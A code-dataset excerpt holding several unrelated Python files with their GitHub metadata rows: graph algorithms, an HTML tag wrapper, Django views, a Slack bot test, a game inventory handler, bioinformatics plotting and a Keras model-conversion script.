Created on Sat Dec 21 04:41:45 2019
@author: marco
"""
#imports
import gzip
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
import math
from bitarray import bitarray
import pandas as pd
import heapq
import time
import sys
import networkx as nx
sys.setrecursionlimit(100000)
from collections import defaultdict
def make_set(vertice,parent,rank):
parent[vertice] = vertice
rank[vertice] = 0
# A utility function to find set of an element i
# (uses path compression technique)
def find(parent, i):
if parent[i] == i:
return i
return find(parent, parent[i])
# A function that does union of two sets of x and y
# (uses union by rank)
def union( parent, rank, x, y):
xroot = find(parent, x)
yroot = find(parent, y)
# Attach smaller rank tree under root of high rank tree
# (Union by Rank)
if rank[xroot] < rank[yroot]:
parent[xroot] = yroot
elif rank[xroot] > rank[yroot]:
parent[yroot] = xroot
#If ranks are same, then make one as root and increment
# its rank by one
else :
parent[yroot] = xroot
rank[xroot] += 1
# The main function to construct MST using Kruskal's algorithm
def KruskalMST(verts,edges):
verts = [int(x) for x in verts]
verts.sort()
edges = sorted(edges,key=lambda item: item[2])
minimum_spanning_tree = []
#Step 1: Sort all the edges in non-decreasing order of their
# weight. If we are not allowed to change the given graph, we
# can create a copy of graph
#print self.graph
parent = [0]*(len(verts)+1);
rank = [0]*(len(verts)+1);
for i in range(len(verts)):
make_set(i,parent,rank)
#edges = sorted(dist_file,key=lambda item: item[2])
for edge in edges:
vertice1, vertice2,weight = edge
if find(parent,verts.index(vertice1)) != find(parent,verts.index(vertice2)):
union(parent,rank,verts.index(vertice1),verts.index(vertice2) )
minimum_spanning_tree.append(edge)
return minimum_spanning_tree
def new_graph(nodes):
#this function create the new graph with the considered nodes
red_g = []
nodes = [str(x) for x in nodes]
for n1 in nodes:
list_of_nodes = [a.id for a in list(g.getVertex(n1).getConnections())]
for i in range(len(list_of_nodes)):
if list_of_nodes[i] in nodes:
new_edge = [n1, list_of_nodes[i], list((g.getVertex(n1).connectedTo).values())[i]]
red_g.append(new_edge)
red_g = [[int(x) for x in lis] for lis in red_g ]
#visualization
G = nx.Graph()
for link in red_g:
G.add_edge(str(link[0]), str(link[1]), weight=link[2])
elarge = [(u, v) for (u, v, d) in G.edges(data=True) if d['weight'] > 0.5]
esmall = [(u, v) for (u, v, d) in G.edges(data=True) if d['weight'] <= 0.5]
pos = nx.spring_layout(G) # positions for all nodes
# nodes
nx.draw_networkx_nodes(G, pos, node_size=700)
# edges
nx.draw_networkx_edges(G, pos, edgelist=elarge,
width=6)
nx.draw_networkx_edges(G, pos, edgelist=esmall,
width=6, alpha=0.5, edge_color='b', style='dashed')
# labels
nx.draw_networkx_labels(G, pos, font_size=20, font_family='sans-serif')
plt.axis('off')
plt.show()
#Kruskal works both on connected and not connected graph
#in this case we analize the results of an input of nodes and an out that can be a connected graph
#so roads which connect all the cities passing just in those cities
#and the case where there can't be a connection through the cities using just those cities
def Function_2(g):
inp=input('Give me a set of nodes (separated by space): ')
nodes=list(map(int, inp.split()))
return KruskalMST(nodes,g)
| [
"noreply@github.com"
] | Marco-Colombi.noreply@github.com |
e5999b065f6134eacca7b4e84558088fb2db9b8a | 767831c642b7f9c4e49d7125bd3add1ce558a49a | /html_tags/details.py | 97fcacf4e8baf127aa16f99d4c7623a252d6e625 | [] | no_license | taka16a23/.pylib | 158152169b23677ccb06f481438995a1cd18bae6 | cf702edb085b76657893daff24f4c6f349424840 | refs/heads/master | 2021-01-19T10:06:11.500989 | 2020-07-26T11:17:16 | 2020-07-26T11:17:16 | 82,158,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,664 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
r"""ditails -- ditails tag
"""
from .html_tag import HtmlTag
class Details(HtmlTag):
"""Details
Details is a HtmlTag.
Responsibility:
HTML の詳細折りたたみ要素 (<details>) は、ウィジェットが
open 状態になった時のみ情報が表示される折りたたみウィジェットを作成します。
概要やラベルは <summary> 要素を使用して提供することができます。
折りたたみウィジェットはふつう、回転して開閉状態を示す小さな三角形を使用し、
その隣のラベルと共に画面上に表現されます。
<details> 要素の最初の子要素が <summary> の場合は、
<summary> 要素が折りたたみウィジェットのラベルとして使用されます。
HTML の詳細折りたたみ要素 (<details>) は、ウィジェットが open
状態になった時のみ情報が表示される折りたたみウィジェットを作成します。
概要やラベルは <summary> 要素を使用して提供することができます。
折りたたみウィジェットはふつう、回転して開閉状態を示す小さな三角形を使用し、
その隣のラベルと共に画面上に表現されます。
<details> 要素の最初の子要素が <summary> の場合は、
<summary> 要素が折りたたみウィジェットのラベルとして使用されます。
"""
class AttributeNames(HtmlTag.AttributeNames):
"""AttributeNames
AttributeNames is a HtmlTag.AttributeNames.
Responsibility:
open
この論理属性は、ページ読み込み時に詳細内容、
つまり <details> 要素の内容が表示されるよう指定するものです。
既定値は false であり、詳細内容は表示しません。
イベント
HTML で対応している通常のイベントに加えて、 <details> 要素は toggle イベントに対応しており、開閉状態が変化するたびに <details> 要素が呼び出されます。イベントは状態が変化した後に送信され、もしブラウザーがイベントを送信する前に状態が2回以上変化しても、イベントは合体して1回しか送信されません。
ウィジェットの状態が変化したことを検出するために、 toggle イベントをリスンすることができます。
details.addEventListener("toggle", event => {
if (details.open) {
/* 要素が開いた方に切り替わった */
} else {
/* 要素が閉じた方に切り替わった */
}
});
"""
OPEN = 'open'
def __init__(self, tags=[], attrs=None, **kwargs):
super(HtmlTag, self).__init__(name='details', tags=[], attrs=None, **kwargs)
def enable_open(self, ):
"""Enable open.
enable_open()
@Return: this instance
@Error:
"""
return self._set_one_attribute(self.AttributeNames.OPEN, '')
def disable_open(self, ):
"""Disable open.
disable_open()
@Return: this instance
@Error:
"""
if self.AttributeNames.OPEN in self.attrs:
del self.attrs[self.AttributeNames.OPEN]
return self
def is_open(self, ):
"""Check open enabled.
is_open()
@Return: this instance
@Error:
"""
return self.AttributeNames.OPEn in self.attrs
# For Emacs
# Local Variables:
# coding: utf-8
# End:
# ditails.py ends here
| [
"takahiroatsumi0517@gmail.com"
] | takahiroatsumi0517@gmail.com |
c5ec5ec31bab15d0c60b675bc1ebd8dbec63bfda | ab3c29601d3d2990f07ef57f1d0d46c15683fe15 | /users/views.py | 7d872c07c59e9de7534fd74d919d59123b881b93 | [] | no_license | ErikPrestegaard/omegaCheckList | bddca0aa93b901503e38b0dd3a07fa1c9790f061 | b7df96f8bdf3031cb50d1417089286de03d45592 | refs/heads/main | 2023-05-03T03:12:40.671438 | 2021-05-28T13:54:13 | 2021-05-28T13:54:13 | 371,712,751 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,471 | py | from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from .forms import UserRegisterForm, UserUpdateForm, ProfileUpdateForm
def register(request):
if request.method == 'POST':
form = UserRegisterForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
messages.success(request, f'Your account has been created! You are now able to log in')
return redirect('login')
else:
form = UserRegisterForm()
return render(request, 'users/register.html', {'form': form})
@login_required
def profile(request):
if request.method == 'POST':
u_form = UserUpdateForm(request.POST, instance=request.user)
p_form = ProfileUpdateForm(request.POST,
request.FILES,
instance=request.user.profile)
if u_form.is_valid() and p_form.is_valid():
u_form.save()
p_form.save()
messages.success(request, f'Your account has been updated!')
return redirect('profile')
else:
u_form = UserUpdateForm(instance = request.user)
p_form = ProfileUpdateForm(instance = request.user.profile)
context = {
'u_form': u_form,
'p_form': p_form
}
return render(request, 'users/profile.html', context) | [
"84975138+ErikPrestegaard@users.noreply.github.com"
] | 84975138+ErikPrestegaard@users.noreply.github.com |
eda76db32eff1c8ef1830ed0c214425cd7c60031 | fc0201220fa4d73c7e68289a80e096fb4215bc3d | /examples/example.py | b16169de66115206906a055a167fc758996e092a | [] | no_license | ACCarnall/loch_nest_monster | b1e817a60f1afa37ca0c65af056b169e8498cc29 | 166784bfc81f15d1af52fc19124c7d43be2f9b8a | refs/heads/master | 2020-03-15T18:52:31.849544 | 2018-09-03T10:16:17 | 2018-09-03T10:16:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,393 | py | import numpy as np
import matplotlib.pyplot as plt
import corner
import lochnest_monster as nesty
def lnprob(param):
y_model = make_fake_data_linear(x, param)
return -0.5*np.sum(((y - y_model)/y_err)**2)
def prior_transform(cube):
return 20.*cube-10.
def make_fake_data_linear(x, param, sigma=None):
m = param[0]
c = param[1]
y = m*x + c
if sigma:
#y += sigma*np.random.randn(x.shape[0])
y_err = np.zeros_like(x) + sigma
return y, y_err
return y
# Make some fake straight line data to fit
x = np.arange(0., 20., 2.)
true_param = [1.5, 5.] # Gradient, intercept
y, y_err = make_fake_data_linear(x, true_param, 1.0)
# Make a plot of the fake data
plt.figure()
plt.errorbar(x, y, yerr=y_err, lw=1.0, linestyle=" ",
capsize=3, capthick=1, color="black")
plt.scatter(x, y, color="blue", s=25, zorder=4, linewidth=1,
facecolor="blue", edgecolor="black")
plt.show()
# Set up the sampler and sample the posterior
sampler = nesty.ellipsoid_sampler(lnprob, prior_transform, len(true_param),
verbose=True, live_plot=False, n_live=400)
# Try out the nball_sampler and box_sampler,
# also try setting live_plot to True.
sampler.run()
# Make a corner plot of the results
corner.corner(sampler.results["samples_eq"])
plt.savefig("example_corner.pdf", bbox_inches="tight")
| [
"adamc@roe.ac.uk"
] | adamc@roe.ac.uk |
16567c239a0a382783d26d63095c22e8dbed7ee5 | 2534d5d9ce1872fa1408224cf889c67c3962bbe0 | /images/migrations/0003_alter_images_image.py | 571c3e6bb5343984cb953a06da1d4e47d19c5012 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | samwel-chege/Personal-Gallery | 561ac8ef864eccc469f514676637c6179fdda428 | b14af9d9cbea42f567d819144a6b87d533d39582 | refs/heads/master | 2023-08-30T00:28:03.157266 | 2021-11-08T06:26:29 | 2021-11-08T06:26:29 | 402,773,544 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | # Generated by Django 3.2.7 on 2021-09-04 12:38
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('images', '0002_auto_20210904_1535'),
]
operations = [
migrations.AlterField(
model_name='images',
name='image',
field=models.ImageField(default='no photo', upload_to='photos'),
),
]
| [
"samwelchegeh09@gmail.com"
] | samwelchegeh09@gmail.com |
2cf468316ab01bf734e453e3ec7c8f84257c7636 | d7b6f3ea6a1f58c2d716a3ba2b922d32dfba3dd5 | /main.py | 328dd1b8c4e28dedd09fc7023776d19a41ca3929 | [] | no_license | rtislacktest/files | 0889fc31c43945400b7b3defe427b16ef134144b | b0558a20c741682fb9208d3db17fd6b522e95b9f | refs/heads/master | 2022-12-03T15:00:25.455812 | 2020-08-19T14:49:18 | 2020-08-19T14:49:18 | 288,362,819 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,105 | py | import os
import SlackPostRequests as slack_api
SLACK_BOT_TOKEN = os.environ['SLACK_BOT_TOKEN']
PATH_TO_FILES = os.environ['PATH_TO_FILES']
START_CHANNEL = os.environ['START_CHANNEL']
if __name__ == '__main__':
#Тест отправки сообщения
r_msg = slack_api.post_to_slack(SLACK_BOT_TOKEN,
slack_api.URL_POST_MESSAGE,
channel = START_CHANNEL,
text = 'slack bot test')
print(f'r_msg: {r_msg}')
# Тест редактирования сообщения
r_upd = slack_api.post_to_slack(SLACK_BOT_TOKEN,
slack_api.URL_CHAT_UPD_MSG,
channel = r_msg["channel"],
ts = r_msg["ts"],
text = 'Слак бот тест')
print(f'r_upd: {r_upd}')
# Тест добавления эмоций в сообщения
r_radd = slack_api.post_to_slack(SLACK_BOT_TOKEN,
slack_api.URL_REACTION_ADD,
channel = r_msg["channel"],
timestamp = r_msg["ts"],
name = 'grin')
print(f'r_rad: {r_radd}')
# Тест удаления эмоций в сообщения
r_rdel = slack_api.post_to_slack(SLACK_BOT_TOKEN,
slack_api.URL_REACTION_DEL,
channel = r_msg["channel"],
timestamp = r_msg["ts"],
name = 'grin')
print(f'r_rad: {r_rdel}')
# Тест загрузки файла в сообщения
r_file = slack_api.upload_file_to_slack(SLACK_BOT_TOKEN,
r'{0}TEST.png'.format(PATH_TO_FILES),
channels = [r_msg["channel"]])
print(f'r_file: {r_file}')
| [
"noreply@github.com"
] | rtislacktest.noreply@github.com |
5ea3abe3100127da5d59957fa8e7d512baa17b7f | 9a7b7f90aa62ce52643e2df83d8aef7ba7803afd | /src/input_handlers/inventory_drop_handler.py | f467da4003f1c32e9ad309fed15c3b0a08d53594 | [] | no_license | voidnologo/tcod_roguelike | d82a060a94784a18156fefe105a3e26a540525e9 | 23d806f960134c17ccbd4e6ca5527f35e654df65 | refs/heads/main | 2023-02-28T11:05:52.809161 | 2021-02-07T16:36:38 | 2021-02-07T16:36:38 | 331,168,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 336 | py | import actions
from input_handlers.inventory_event_handler import InventoryEventHandler
class InventoryDropHandler(InventoryEventHandler):
"""
Handle dropping an inventory item
"""
TITLE = 'Select an item to drop'
def on_item_selected(self, item):
return actions.DropItemAction(self.engine.player, item)
| [
"(none)"
] | (none) |
6064a1d68a73eba25dce46779f0fae12a18e53cf | 20b6c8841b14d30d00f3520e8dd212cc9200ab8f | /items.py | 5331947bf197cd1c17a1f2266d092aac5d6d8911 | [] | no_license | kdurek/tryga | 6a25f86cbb7e8d880437290877995f5f97731131 | 1dc9292c108ccc22878e0c159ef52f8d33030ed7 | refs/heads/master | 2022-05-12T16:18:48.538808 | 2020-02-26T22:54:08 | 2020-02-26T22:54:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | class Weapon:
def __init__(self, name, damage, description):
self.name = name
self.damage = damage
self.description = description
| [
"noreply@github.com"
] | kdurek.noreply@github.com |
df7015dc6cede234e2a5bec11f386fb53a89c388 | e1b6911e90e8f8636066f6566377f1e57385b1b8 | /components/GetStatistics/GetStatistics.py~ | 263ddf273c6b6c3de2fa0d126f1b61fac5b569b1 | [] | no_license | severinb/ChIPseq-pipeline | 6ab3f228c4004970e1aaa41dcef49cba89226c11 | 3ff11ce3bcd91a8ffabb6043a2d62209e9a5b852 | refs/heads/master | 2021-01-15T19:12:51.675353 | 2014-10-13T10:05:31 | 2014-10-13T10:05:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,136 | #!/usr/bin/env python
import component_skeleton.main
import subprocess
import os, re
from string import *
import datetime, time
from pylab import *
from scipy.stats import gaussian_kde
import sys
def make_boxplot(xarr, yarr, binnum, outplot, xlab, ylab, plabel=None):
#make box plots of posterior distributions stratified by height
binedges = linspace(min(array(xarr)), max(array(xarr)), binnum)
datamatrix = [[] for i in binedges]
for i in arange(len(yarr)):
yval = yarr[i]
xval = xarr[i]
index = where(binedges <= xval)[0][-1] #include smaller edge into bin
datamatrix[index].append(yval)
# print '-------------------'
# print binedges
#create violin plots on an axis
figure()
bp = True
violin = True
dist = max(binedges)-min(binedges)
w = (1.0/(2*binnum))*dist
if violin:
for d,p in zip(datamatrix, map(float, [mean([binedges[i], binedges[i+1]]) for i in arange(len(binedges) - 1)])):
if len(d) <= 1 or sum(d) == 0: #gaussian_kde function doesn't accept one value lists and empty lists
continue
try:
k = gaussian_kde(d) #calculates the kernel density
m = k.dataset.min() #lower bound of violin
M = k.dataset.max() #upper bound of violin
x = arange(m,M,(M-m)/100.) # support for violin
## this doesn't work as it should. Box plots and violins get somehow shifted relatively to each other.
# #try to not plot outliers (more than 3 standard deviations away from mode):
# kdemode = k.evaluate(x).max()
# kdestd = sqrt(k.dataset.var())
# m1 = max(kdemode - 3*kdestd, m)
# M1 = min(kdemode + 3*kdestd, M)
# x = arange(m1,M1,(M1-m1)/100.)
v = k.evaluate(x) #violin profile (density curve)
v = v/v.max()*w #scaling the violin to the available space
fill_betweenx(x,p,v+p,facecolor='y',alpha=0.3)
fill_betweenx(x,p,-v+p,facecolor='y',alpha=0.3)
except Exception:
print d, p, 'Couldn\'t make a violin plot'
if bp:
boxplot(datamatrix, positions=map(float, [round(mean([binedges[i], binedges[i+1]]), 2) for i in arange(len(binedges) -1)]), widths = w, sym='')
xlim([min(binedges), max(binedges)])
xticks(rotation=30)
xlabel(xlab)
ylabel(ylab)
if plabel:
title(plabel)
savefig(outplot)
savefig(outplot.rstrip('.pdf'))
close()
def plotTFBSdist(peakstats, TFBSstats, region_dict, minpost, histplot, scatterplot):
    """Plot the distance from each peak to its nearest predicted TFBS.

    Produces a posterior-weighted histogram of nearest-site offsets together
    with a shuffled-site background (histplot), and a scatter plot of offset
    versus site posterior (scatterplot).

    Arguments:
    peakstats   -- whitespace table: columns 1/2 are start/end, column 3 the
                   peak ID; lines starting with '#' are skipped
    TFBSstats   -- whitespace table: chrom start end peakID distance
                   posterior TFBS_coverage; lines starting with '#' are skipped
    region_dict -- regionid -> (start, end) coordinates used for shuffling
    minpost     -- posterior cut-off; only sites at or above it count as real
    histplot    -- output file for the offset histogram (saved twice: as given
                   and without its extension)
    scatterplot -- output file for the offset/posterior scatter plot
    """
    # peakid -> peak center (midpoint of start/end)
    peakDict = {}
    for line in open(peakstats):
        if line.startswith('#'):
            continue
        else:
            t = line.split()
            center = mean([int(t[2]), int(t[1])])
            peakid = t[3]
            peakDict[peakid] = center
    # regionid -> list of TFBS centers / posteriors (parallel lists)
    TFBSdict = {}
    postDict = {}
    for line in open(TFBSstats):
        if line.startswith('#'):
            continue
        else:
            t = line.split()
            center = mean([int(t[2]), int(t[1])])
            regionid = t[3].split('.')[0]
            if float(t[5]) >= minpost:  # keep only sites confident enough to be considered real
                try:
                    TFBSdict[regionid].append(center)
                    postDict[regionid].append(float(t[5]))
                except KeyError:
                    TFBSdict[regionid] = [center]
                    postDict[regionid] = [float(t[5])]
    dists = []  # offset of the nearest real site, per peak
    posts = []  # posterior of that nearest site
    # Background: shuffle site positions uniformly within the region and take
    # the nearest shuffled site, sample_size times per peak.
    shuffled_dists = []
    shuffled_posts = []
    noTFBS = 0  # number of peaks whose region has no confident site at all
    sample_size = 1000
    for peakid in peakDict:
        regionid = peakid.split('.')[0]
        try:
            sites = array(TFBSdict[regionid])
            site_posts = array(postDict[regionid])
        except KeyError:
            noTFBS += 1
            continue
        sites -= peakDict[peakid]  # express site positions relative to the peak center
        idx = argmin(abs(sites))
        dists.append(sites[idx])
        posts.append(site_posts[idx])
        # draw sample_size random site configurations within the region
        region_coords = region_dict[regionid]
        n = len(sites)
        shuffled_sites = randint(region_coords[0], region_coords[1], (sample_size, n))
        # not in-place: the peak center is a float and the random positions are
        # ints, so '-=' would require an unsafe int<-float cast
        shuffled_sites = shuffled_sites - peakDict[peakid]
        idxs = abs(shuffled_sites).argmin(axis=1)
        for i, idx in enumerate(idxs):
            shuffled_dists.append(shuffled_sites[i, idx])
            shuffled_posts.append(site_posts[idx])
    if len(dists) != 0:
        # posterior-weighted histograms of the offsets, restricted to +-100 bp
        binnum = int(sqrt(min(sum(posts), len(posts))))
        binrange = linspace(-100, 100, max(2, binnum))
        h = hist(array(dists), bins=binrange, weights=posts)
        close()
        shuffled_h = hist(array(shuffled_dists), bins=binrange, weights=shuffled_posts)
        close()
        figure()
        hbase = [mean([h[1][i], h[1][i + 1]]) for i in arange(len(h[1]) - 1)]
        plot(hbase, h[0] / float(len(peakDict)), label='real sites')
        shuffled_hbase = [mean([shuffled_h[1][i], shuffled_h[1][i + 1]]) for i in arange(len(shuffled_h[1]) - 1)]
        # divide by sample_size as well: each peak contributed sample_size shuffles
        plot(shuffled_hbase, shuffled_h[0] / float(len(peakDict) * sample_size), label='shuffled sites')
        xlabel('TFBS - peakcenter offset')
        ylabel('Probability of having a TFBS at offset')
        xlim([-100, 100])
        legend()
        savefig(histplot)
        # second copy without the extension; os.path.splitext removes only the
        # suffix, whereas str.rstrip('.pdf') strips any trailing 'p'/'d'/'f'/'.'
        savefig(os.path.splitext(histplot)[0])
        close()
    figure()
    plot(dists, posts, '.')
    savefig(scatterplot)
    close()
def plotStats(peakstats, plotlist, minpost):
    """Plot summary statistics for all peaks and return the Pearson
    correlation between peak Z-score and peak posterior (binding-site count).

    Arguments:
    peakstats -- whitespace table with one header line; columns 4, 5 and 6
                 hold Z-score, quality (RMSD) and posterior per peak
    plotlist  -- output file names, in order:
                 [0] height/posterior scatter, [1] quality/posterior scatter,
                 [2] height/posterior violin,  [3] quality/posterior violin,
                 [4] posterior histogram,      [5] posterior cumulative plot
    minpost   -- posterior cut-off drawn into the cumulative plot

    Side effect: sets the module-level flag 'shit' (read elsewhere in this
    component) to True when the correlation is undefined (NaN).
    """
    a = loadtxt(peakstats, usecols=[4, 5, 6], skiprows=1)  # 4: zscore, 5: quality, 6: peak posterior
    # a single data row yields a 1-D array; force 2-D so the column
    # extraction below always returns arrays
    a = atleast_2d(a)
    peakzscores = a.T[0]
    peakquals = a.T[1]
    peakposts = a.T[2]
    # Pearson correlation between peak Z-score and posterior
    covmat = cov(peakzscores, peakposts)
    r_mat = corrcoef(peakzscores, peakposts)
    print(r_mat, covmat)
    pearson_r = r_mat[0][1]
    fov1 = pearson_r
    # module-level flag: True when the correlation could not be computed
    # (e.g. zero variance in one of the columns)
    global shit
    shit = False
    if isnan(pearson_r):
        shit = True
    # box/violin plots of posterior distributions stratified by height/quality
    make_boxplot(peakzscores, peakposts, 20, plotlist[2], 'ChIP-Signal (Z-score)', 'Number of Binding Sites', plabel='Correlation: %s' % round(fov1, 4))
    make_boxplot(log10(array(peakquals)), peakposts, 40, plotlist[3], 'log10(peak quality (RMSD))', 'number of binding sites')
    figure()
    plot(peakzscores, peakposts, '.', rasterized=True)
    xlabel('peak Z-score')
    ylabel('number of binding sites')
    savefig(plotlist[0])
    close()
    figure()
    plot(log10(array(peakquals)), peakposts, '.', rasterized=True)
    xlabel('log10(peak quality (RMSD))')
    ylabel('peak posterior')
    savefig(plotlist[1])
    close()
    figure()
    # int(): hist expects an integer bin count (matches the int(sqrt(...))
    # usage elsewhere in this file)
    hist(peakposts, int(sqrt(len(peakposts))))
    xlabel('number of binding sites')
    ylabel('number of peaks')
    savefig(plotlist[4])
    close()
    figure()
    # cumulative count of peaks with at most a given number of binding sites
    plot(sorted(peakposts), arange(1, len(peakposts) + 1, 1))
    plot([minpost, minpost], [1, len(peakposts)], label='number of binding site cut-off')
    xscale('log')
    yscale('log')
    xlabel('number of binding sites')
    ylabel('number of peaks with up to number of binding sites')
    legend(loc='lower right')
    savefig(plotlist[5])
    close()
    return fov1
def computeExpectedCoverage(TFBSstats, plotfile, covs_list):
"""
-This function plots a violin plot of TFBS posterior versus coverage at that position
-Secondly it computes:
sum(c(i)*w(i)) / ( sum(w(i)) * mean(c) )
This is a measure for how centered to the peaks TFBSs are.
"""
# make histograms of coverage frequencies at sites and in total.
a = loadtxt(TFBSstats, usecols=[5,6], skiprows=1) #5: posterior, 6: coverage
try:
posts = a.T[0]
TFBScovs = a.T[1]
except IndexError:
posts = array([1])
TFBScovs = array([1])
make_boxplot(TFBScovs, posts, 20, plotfile, 'coverage/height at TFBS', 'posterior of TFBS')
expcov = sum(posts*TFBScovs)/(sum(posts) * mean(covs_list)) #mean(TFBScovs))
return expcov
def execute(cf):
"""
This component gives true regions (determined by a posterior cut-off on TFBS).
It produces some plots:
-histogram of region posteriors (one with summed posteriors and one with maximum TFBS posterior per region)
-plots peak coverage (from RegionCoverage) plots with TFBSs (above 0.5 posterior cut-off)
"""
##Ports and parameters
peakstats = cf.get_input("peakstats")
TFBSstats = cf.get_input("TFBSstats")
regcov_dir = cf.get_input("RegCov_dir")
log_file = cf.get_output("log_file")
#plots:
TFBS_peakcenter_dist_hist = cf.get_output("TFBS_peakcenter_dist_hist")
TFBS_post_peakcenter_dist_scatter = cf.get_output("TFBS_post_peakcenter_dist_scatter")
zscore_post_scatter = cf.get_output("zscore_post_scatter")
quality_post_scatter = cf.get_output("quality_post_scatter")
zscore_post_violin = cf.get_output("zscore_post_violin")
quality_post_violin = cf.get_output("quality_post_violin")
TFBSheight_TFBSpost_scatter = cf.get_output("TFBSheight_TFBSpost_scatter")
post_hist = cf.get_output("post_hist")
post_cumulative = cf.get_output("post_cumulative")
cov_hists = cf.get_output("coverage_histograms")
plotlist = [zscore_post_scatter, quality_post_scatter, zscore_post_violin,
quality_post_violin, post_hist, post_cumulative]
minpost = cf.get_parameter("minposterior", "float")
T1 = datetime.datetime.now()
# read in region coverage: one dictionary regionid: start-stop and one list with all coverages
covs_list = []
region_dict = {}
for regcov in os.listdir(regcov_dir):
#chr1 120313250 120313750 reg1013598 1 3.5
regcov_file = os.path.join(regcov_dir, regcov)
a = loadtxt(regcov_file, usecols=[5])
covs_list += list(a)
with open(regcov_file) as f:
l = f.readline().strip().split()
region_dict[l[3]] = [int(l[1]), int(l[2])]
plotTFBSdist(peakstats, TFBSstats, region_dict, minpost, TFBS_peakcenter_dist_hist, TFBS_post_peakcenter_dist_scatter)
fov1 = plotStats(peakstats, plotlist, minpost)
expcov = computeExpectedCoverage(TFBSstats, TFBSheight_TFBSpost_scatter, covs_list)
# plot coverage histograms (coverage at sites and coverage everywhere)
#hr = hist(covs_list, sqrt(len(covs_list)), histtype='step', normed=True, label='region coverage')
site_covs = loadtxt(TFBSstats, usecols=[6], skiprows=1)
site_posts = loadtxt(TFBSstats, usecols=[5], skiprows=1)
binnum = int(sqrt(min(sum(site_posts), len(site_posts))))
bin_range = linspace(min(covs_list), max(covs_list), max(binnum,2))
if not shit:
hr = hist(covs_list, bin_range)
hs = hist(site_covs, bin_range, weights=site_posts)
close()
figure()
hrbase = [mean([hr[1][i], hr[1][i+1]]) for i in arange(len(hr[1])-1)]
plot(log(hrbase), log(hr[0]/float(len(covs_list))), label='region coverage')
hsbase = [mean([hs[1][i], hs[1][i+1]]) for i in arange(len(hs[1])-1)]
#plot(log(hsbase), log(hs[0]/float(len(site_covs))), label='site coverage')
plot(log(hsbase), log(hs[0]/sum(site_posts)), label='site coverage')
else:
figure()
title('Enrichment at Binding Sites: %s' %round(expcov,4))
xlabel('log(Coverage)')
ylabel('log(Frequency)')
legend()
savefig(cov_hists)
savefig(cov_hists.rstrip('.pdf'))
close()
#count how many peaks have peak posterior above minpost
posts = loadtxt(peakstats, usecols=[6], skiprows=1) #load summed posts
totalnum = len(posts)
truenum = len(where(posts>= minpost)[0])
falsenum = totalnum - truenum
T2 = datetime.datetime.now()
text = '\n'.join(['Overall statistics:',
'\t- Number of true peaks out of total number of peaks: %i/%i' %(truenum, totalnum),
'\t- %.2f percent are true.' %(100*float(truenum)/totalnum),
'\t- Cut-off: minimum summed posterior of %.2f' %minpost,
'\t- Peak plots contain TFBS of posterior >= %.2f' %minpost,
'Statistic for centering of TFBSs at peak centers:',
'\t- Enrichment at binding sites: %s' %round(expcov,4),
'Correlation between peak Z-score and number of binding sites at peak: %s' %round(fov1,4)
])
timetext = '\n'.join(['Running time:',
'\t- Overall: %s' %(T2-T1)
])
lf = open(log_file, 'w')
lf.write(text + '\n')
#lf.write(timetext)
lf.close()
return 0
component_skeleton.main.main(execute)
| [
"severin.berger@stud.unibas.ch"
] | severin.berger@stud.unibas.ch | |
2d3fe35ed9b89a8c34620b3e95d655218a412919 | a46a0a638d18906ecef55352deb5b8697dedf971 | /src/convert_model.py | 14ccc03afbe6d7d1dc184eebc3b7ba1a7ee5f83e | [
"MIT"
] | permissive | skyimager/stanford_cars_classification | eafd2cc8730628e3332568e9db29575c8416f75a | 812e34c66ac37d164545980676ba2d89fe751b0c | refs/heads/master | 2020-06-05T07:07:16.399148 | 2019-06-18T16:17:52 | 2019-06-18T16:17:52 | 192,354,175 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,761 | py | #!/usr/bin/env python
"""
Copyright 2017-2018 Fizyr (https://fizyr.com)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
import os
import sys
import keras
import tensorflow as tf
# Change these to absolute imports if you copy this script outside the keras_retinanet package.
from src import networks
from src.utils.config import read_config_file, parse_anchor_parameters
def get_session():
""" Construct a modified tf session.
"""
config = tf.ConfigProto()
os.environ["CUDA_VISIBLE_DEVICES"] = ""
return tf.Session(config=config)
def parse_args(args):
parser = argparse.ArgumentParser(description='Script for converting a training model to an inference model.')
parser.add_argument('model_in', help='The model to convert.')
parser.add_argument('model_out', help='Path to save the converted model to.')
parser.add_argument('--backbone', help='The backbone of the model to convert.', default='resnet50')
parser.add_argument('--no-nms', help='Disables non maximum suppression.', dest='nms', action='store_false')
parser.add_argument('--no-class-specific-filter', help='Disables class specific filtering.', dest='class_specific_filter', action='store_false')
parser.add_argument('--config', help='Path to a configuration parameters .ini file.')
return parser.parse_args(args)
def main(args=None):
# parse arguments
if args is None:
args = sys.argv[1:]
args = parse_args(args)
# Set modified tf session to avoid using the GPUs
keras.backend.tensorflow_backend.set_session(get_session())
# optionally load config parameters
anchor_parameters = None
if args.config:
args.config = read_config_file(args.config)
if 'anchor_parameters' in args.config:
anchor_parameters = parse_anchor_parameters(args.config)
# load the model
model = models.load_model(args.model_in, backbone_name=args.backbone)
# check if this is indeed a training model
models.check_training_model(model)
# convert the model
model = models.convert_model(model, nms=args.nms, class_specific_filter=args.class_specific_filter, anchor_params=anchor_parameters)
# save model
model.save(args.model_out)
if __name__ == '__main__':
main()
| [
"pradip.gupta@ril.com"
] | pradip.gupta@ril.com |
